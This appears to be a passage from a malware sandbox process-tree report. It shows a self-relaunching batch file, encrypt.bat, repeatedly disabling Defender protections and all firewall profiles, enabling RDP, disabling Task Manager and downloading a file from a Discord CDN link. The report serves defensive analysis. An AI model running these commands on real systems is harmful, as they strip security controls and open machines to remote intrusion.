C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"26⤵PID:2340
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"26⤵PID:4848
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"26⤵PID:4916
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"26⤵PID:2364
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"26⤵PID:2468
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable26⤵PID:1528
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE26⤵
- Modifies Windows Firewall
PID:1200
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off26⤵PID:4740
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off26⤵PID:1060
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off26⤵PID:3928
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off26⤵PID:5080
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off26⤵PID:1656
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"26⤵PID:3556
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"26⤵PID:3172
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"26⤵PID:1664
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"26⤵PID:880
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"26⤵PID:4676
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"26⤵PID:2744
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"26⤵
- Blocklisted process makes network request
PID:3372
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"26⤵
- Modifies registry class
PID:2632 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"27⤵PID:1156
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"28⤵PID:3164
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f28⤵PID:4812
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"28⤵PID:2340
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f28⤵PID:2952
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"28⤵PID:2680
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"28⤵PID:3460
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"28⤵PID:2720
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"28⤵PID:5024
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"28⤵PID:4524
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable28⤵PID:1656
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE28⤵PID:3860
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off28⤵PID:3472
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off28⤵PID:4532
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off28⤵PID:3068
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off28⤵PID:1192
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off28⤵PID:1780
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"28⤵PID:2688
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"28⤵PID:3788
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"28⤵PID:2364
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"28⤵PID:1380
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"28⤵PID:900
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"28⤵PID:1656
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"28⤵
- Blocklisted process makes network request
PID:4248
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"28⤵
- Modifies registry class
PID:2632 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"29⤵PID:1104
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV130⤵PID:4812
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"30⤵PID:2604
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f30⤵PID:2952
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"30⤵PID:3272
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f30⤵PID:2328
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"30⤵PID:2864
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"30⤵PID:880
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"30⤵PID:1492
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"30⤵PID:5024
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"30⤵PID:240
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable30⤵PID:1108
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE30⤵
- Modifies Windows Firewall
PID:1376
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off30⤵PID:4064
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off30⤵PID:1188
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off30⤵PID:5060
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off30⤵PID:4532
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off30⤵PID:2360
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"30⤵PID:4748
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"30⤵PID:2412
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"30⤵
- Command and Scripting Interpreter: PowerShell
PID:4800
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"30⤵PID:892
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"30⤵
- Command and Scripting Interpreter: PowerShell
PID:3876
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"30⤵PID:1876
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"30⤵
- Blocklisted process makes network request
PID:4500
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"30⤵
- Modifies registry class
PID:4024 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"31⤵PID:3816
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"32⤵PID:3044
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f32⤵PID:3080
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"32⤵PID:2960
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f32⤵PID:2444
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"32⤵PID:4548
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"32⤵PID:432
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"32⤵PID:4704
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"32⤵PID:2012
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"32⤵PID:3408
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable32⤵PID:452
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE32⤵PID:5080
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off32⤵PID:2500
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off32⤵
- Modifies Windows Firewall
PID:3952
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off32⤵PID:2172
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off32⤵PID:2060
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off32⤵PID:5056
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"32⤵PID:3164
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"32⤵PID:1096
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"32⤵PID:1092
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"32⤵PID:1528
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"32⤵PID:5032
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"32⤵PID:1064
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"32⤵
- Blocklisted process makes network request
PID:4572
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"32⤵PID:4584
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"33⤵PID:3460
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"34⤵PID:1736
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f34⤵PID:1840
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"34⤵PID:2632
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f34⤵PID:2340
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"34⤵PID:1264
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"34⤵PID:2788
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"34⤵PID:2396
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"34⤵
- Command and Scripting Interpreter: PowerShell
PID:2232
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"34⤵PID:2352
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable34⤵PID:900
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE34⤵PID:4740
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off34⤵PID:2516
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off34⤵PID:4244
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off34⤵PID:1560
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off34⤵PID:5060
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off34⤵PID:4588
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"34⤵
- Command and Scripting Interpreter: PowerShell
PID:396
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"34⤵PID:1992
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"34⤵PID:4312
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"34⤵PID:4900
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"34⤵PID:892
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"34⤵PID:2100
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"34⤵
- Blocklisted process makes network request
PID:452
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"34⤵
- Modifies registry class
PID:4516 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"35⤵PID:2912
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"36⤵PID:3076
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f36⤵PID:1432
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"36⤵PID:3148
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f36⤵PID:1584
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"36⤵PID:4436
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"36⤵PID:3980
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"36⤵PID:3040
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"36⤵PID:2044
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"36⤵PID:460
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable36⤵PID:4760
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE36⤵PID:4288
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off36⤵PID:3340
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off36⤵PID:1884
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off36⤵PID:1688
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off36⤵PID:1932
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off36⤵PID:3952
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"36⤵
- Command and Scripting Interpreter: PowerShell
PID:4584
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"36⤵PID:1432
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"36⤵PID:4432
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"36⤵PID:1616
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"36⤵PID:236
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"36⤵PID:276
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"36⤵
- Blocklisted process makes network request
PID:1448
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"36⤵PID:1392
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"37⤵PID:2072
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"38⤵PID:2360
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f38⤵PID:996
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"38⤵PID:4816
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f38⤵PID:4284
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"38⤵PID:2500
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"38⤵PID:4244
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"38⤵
- Command and Scripting Interpreter: PowerShell
PID:2252
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"38⤵PID:2008
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"38⤵PID:2364
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable38⤵PID:236
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE38⤵PID:2764
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off38⤵PID:3480
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off38⤵PID:3000
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off38⤵
- Modifies Windows Firewall
PID:4972
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off38⤵
- Modifies Windows Firewall
PID:1884
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off38⤵PID:3276
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"38⤵PID:3164
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"38⤵PID:2320
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"38⤵PID:3160
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"38⤵PID:4792
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"38⤵PID:1476
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"38⤵PID:2220
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"38⤵
- Blocklisted process makes network request
PID:740
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"38⤵
- Modifies registry class
PID:2324 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"39⤵PID:3472
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"40⤵PID:2912
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f40⤵PID:3960
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"40⤵PID:3908
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f40⤵PID:4064
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"40⤵PID:3572
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"40⤵
- Command and Scripting Interpreter: PowerShell
PID:4584
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"40⤵PID:3788
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"40⤵PID:2528
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"40⤵PID:976
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable40⤵PID:1504
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE40⤵PID:240
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off40⤵PID:3008
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off40⤵PID:1408
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off40⤵PID:424
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off40⤵PID:4756
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off40⤵PID:3716
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"40⤵PID:3164
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"40⤵PID:1780
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"40⤵PID:1104
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"40⤵PID:1264
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"40⤵PID:3768
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"40⤵PID:2316
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"40⤵
- Blocklisted process makes network request
PID:2880
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"40⤵
- Modifies registry class
PID:1884 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"41⤵PID:4756
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"42⤵PID:2808
-
-
